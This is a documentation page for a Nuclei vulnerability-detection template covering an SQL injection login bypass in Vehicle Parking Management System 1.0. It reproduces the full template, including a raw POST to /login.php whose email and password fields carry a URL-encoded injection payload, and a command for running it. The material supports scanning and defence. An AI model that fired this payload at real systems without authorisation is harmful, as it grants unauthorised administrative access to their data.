Vehicle Parking Management System 1.0 - SQL Injection
ID: vpms-auth-bypass
Severity: critical
Author: dwisiswant0
Tags: auth-bypass,edb,sqli
Description
Section titled “Description”Vehicle Parking Management System 1.0 contains a SQL injection vulnerability via the password parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: vpms-auth-bypass
info: name: Vehicle Parking Management System 1.0 - SQL Injection author: dwisiswant0 severity: critical description: Vehicle Parking Management System 1.0 contains a SQL injection vulnerability via the password parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/48877 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: max-request: 1 tags: auth-bypass,edb,sqli
http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/login.php Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8
email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1
matchers-condition: and matchers: - type: word words: - "LAGOS PARKER" - "Login Successfully" - "location.href = 'index.php';" condition: and part: body
- type: status status: - 200# digest: 4b0a0048304602210099f43c7a664504b04638ae00b4cbe03910facdd1bda5177a458560a77471b6f6022100e5a6b80a951bae1b32dc3f17203e6529b1060545cb5c440b373a864a5afcb6ba:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/vpms-auth-bypass.yaml"